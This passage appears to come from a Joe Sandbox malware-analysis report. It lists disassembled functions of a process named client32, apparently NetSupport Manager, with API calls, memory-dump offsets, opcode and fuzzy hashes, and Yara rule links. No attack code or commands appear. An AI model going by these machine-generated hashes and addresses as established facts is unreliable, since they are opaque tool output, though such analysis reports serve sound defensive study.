                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                                • API String ID: 2735369351-763374134
                                                                                                • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                                • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                                                • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                                • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                                                Function 69D07A09 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 69D07960
                                                                                                  • Part of subcall function 69D0F4BC: __mtinitlocknum.LIBCMT ref: 69D0F4D2
                                                                                                  • Part of subcall function 69D0F4BC: __amsg_exit.LIBCMT ref: 69D0F4DE
                                                                                                  • Part of subcall function 69D0F4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,69D06E81,0000000D), ref: 69D0F4E6
                                                                                                • InterlockedDecrement.KERNEL32(00000000,69D27328,00000008), ref: 69D07972
                                                                                                • _free.LIBCMT ref: 69D07987
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • __lock.LIBCMT ref: 69D079A0
                                                                                                • ___removelocaleref.LIBCMT ref: 69D079AF
                                                                                                • ___freetlocinfo.LIBCMT ref: 69D079C8
                                                                                                • _free.LIBCMT ref: 69D079E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                • String ID:
                                                                                                • API String ID: 556454624-0
                                                                                                • Opcode ID: dd5d13e0c66c9ff25501f8284dca855501a17f891e46b29ab20242ce65fb94c5
                                                                                                • Instruction ID: eba252102d967d156aab518ff250a913fa31783dc2785918e2a619f70ffa3203
                                                                                                • Opcode Fuzzy Hash: dd5d13e0c66c9ff25501f8284dca855501a17f891e46b29ab20242ce65fb94c5
                                                                                                • Instruction Fuzzy Hash: 4911A031601704FADB20DFA8AA20B5E73A4AF00728F20953DE4A9DFDD0DB34D980C6A4
                                                                                                Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?,?,00000000,756F110C,?,1100BF9B,?,00000000,00000002), ref: 1100B350
                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                                  • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                                  • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                                  • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                                  • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                                  • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                                • waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B3B8
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                                • _free.LIBCMT ref: 1100B3C8
                                                                                                • _free.LIBCMT ref: 1100B3CE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                • String ID:
                                                                                                • API String ID: 705253285-0
                                                                                                • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                                • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                                                Function 69CFDA30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 69CFDA47
                                                                                                • CreateThread.KERNEL32(00000000,?,?,?,00000000,?), ref: 69CFDA6A
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?), ref: 69CFDA97
                                                                                                • CloseHandle.KERNEL32(?), ref: 69CFDAA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID: Refcount.cpp$hThread
                                                                                                • API String ID: 3360349984-1332212576
                                                                                                • Opcode ID: 1c0c3aa780ed8fdf779c56e98a8f22a9bffa600a6fbe29c588990ddc7ad9a62f
                                                                                                • Instruction ID: 69f22a42b0c453e8768564fe0b9a778ac20d9da8fb6d65a3dbb2a0484bd69229
                                                                                                • Opcode Fuzzy Hash: 1c0c3aa780ed8fdf779c56e98a8f22a9bffa600a6fbe29c588990ddc7ad9a62f
                                                                                                • Instruction Fuzzy Hash: A001B176304301AFF7208F55DC55F07BBACEF45761F008229FB1597680E670E9098BA4
                                                                                                Function 11079270 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                                • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                                                • API String ID: 2776021309-3012761530
                                                                                                • Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                                • Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
                                                                                                • Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                                • Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
                                                                                                Function 69D06E37 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,69D272D8,00000008,69D06F3F,00000000,00000000), ref: 69D06E48
                                                                                                • __lock.LIBCMT ref: 69D06E7C
                                                                                                  • Part of subcall function 69D0F4BC: __mtinitlocknum.LIBCMT ref: 69D0F4D2
                                                                                                  • Part of subcall function 69D0F4BC: __amsg_exit.LIBCMT ref: 69D0F4DE
                                                                                                  • Part of subcall function 69D0F4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,69D06E81,0000000D), ref: 69D0F4E6
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 69D06E89
                                                                                                • __lock.LIBCMT ref: 69D06E9D
                                                                                                • ___addlocaleref.LIBCMT ref: 69D06EBB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                • String ID: KERNEL32.DLL
                                                                                                • API String ID: 637971194-2576044830
                                                                                                • Opcode ID: 73ca49cd47587b4327d655ad061e5bf8c22d9c039ca49d510bffd88ea064da50
                                                                                                • Instruction ID: 7397ff67c349c5e06f8be137ac9dad524e41a3100fd0d6e04203b95156eaf3d8
                                                                                                • Opcode Fuzzy Hash: 73ca49cd47587b4327d655ad061e5bf8c22d9c039ca49d510bffd88ea064da50
                                                                                                • Instruction Fuzzy Hash: 7F01A175400B009EE720CF65C41534EBBE0AF51328F20DA2EE99693BA0CB74E544CF24
                                                                                                Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadMenuA.USER32 ref: 1100339D
                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                                                • DestroyMenu.USER32 ref: 110033F2
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                • API String ID: 468487828-934300333
                                                                                                • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                                • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                                • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                                • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                                Function 69D0A1B3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 69D0A1D4
                                                                                                  • Part of subcall function 69D06F64: __getptd_noexit.LIBCMT ref: 69D06F67
                                                                                                  • Part of subcall function 69D06F64: __amsg_exit.LIBCMT ref: 69D06F74
                                                                                                • __getptd.LIBCMT ref: 69D0A1E5
                                                                                                • __getptd.LIBCMT ref: 69D0A1F3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                • String ID: MOC$RCC$csm
                                                                                                • API String ID: 803148776-2671469338
                                                                                                • Opcode ID: 33004280def899aedbdd59ab7d35921a2397866726736b24204f4e0db693ef8a
                                                                                                • Instruction ID: 7307fbf521e15053c9ae2d3a841593e9cf846f1e5550f51a75ee83e2f8155642
                                                                                                • Opcode Fuzzy Hash: 33004280def899aedbdd59ab7d35921a2397866726736b24204f4e0db693ef8a
                                                                                                • Instruction Fuzzy Hash: 3EE0E534504204DEC700EF688069B6837E5BB48228F95A2B6E51C8BA62C728A9D0C953
                                                                                                Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                                                • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                                                • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11027614
                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                                • String ID:
                                                                                                • API String ID: 2375713580-0
                                                                                                • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                                • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                                                • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                                • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                                                Function 111715A2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 111715AE
                                                                                                  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                                  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                                • __amsg_exit.LIBCMT ref: 111715CE
                                                                                                • __lock.LIBCMT ref: 111715DE
                                                                                                • InterlockedDecrement.KERNEL32(?,111DD2D8,0000000C,111642B9,?,?,11174EF7), ref: 111715FB
                                                                                                • _free.LIBCMT ref: 1117160E
                                                                                                • InterlockedIncrement.KERNEL32(021218E0,111DD2D8,0000000C,111642B9,?,?,11174EF7), ref: 11171626
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                • String ID:
                                                                                                • API String ID: 3470314060-0
                                                                                                • Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                                • Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
                                                                                                • Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                                • Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6
                                                                                                Function 69D07A14 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 69D07A20
                                                                                                  • Part of subcall function 69D06F64: __getptd_noexit.LIBCMT ref: 69D06F67
                                                                                                  • Part of subcall function 69D06F64: __amsg_exit.LIBCMT ref: 69D06F74
                                                                                                • __calloc_crt.LIBCMT ref: 69D07A2B
                                                                                                  • Part of subcall function 69D0D3F5: Sleep.KERNEL32(00000000,69D06F16,00000001,00000214), ref: 69D0D41D
                                                                                                • __lock.LIBCMT ref: 69D07A61
                                                                                                • ___addlocaleref.LIBCMT ref: 69D07A6D
                                                                                                • __lock.LIBCMT ref: 69D07A81
                                                                                                • InterlockedIncrement.KERNEL32(?,69D27350,0000000C), ref: 69D07A91
                                                                                                  • Part of subcall function 69D060F9: __getptd_noexit.LIBCMT ref: 69D060F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
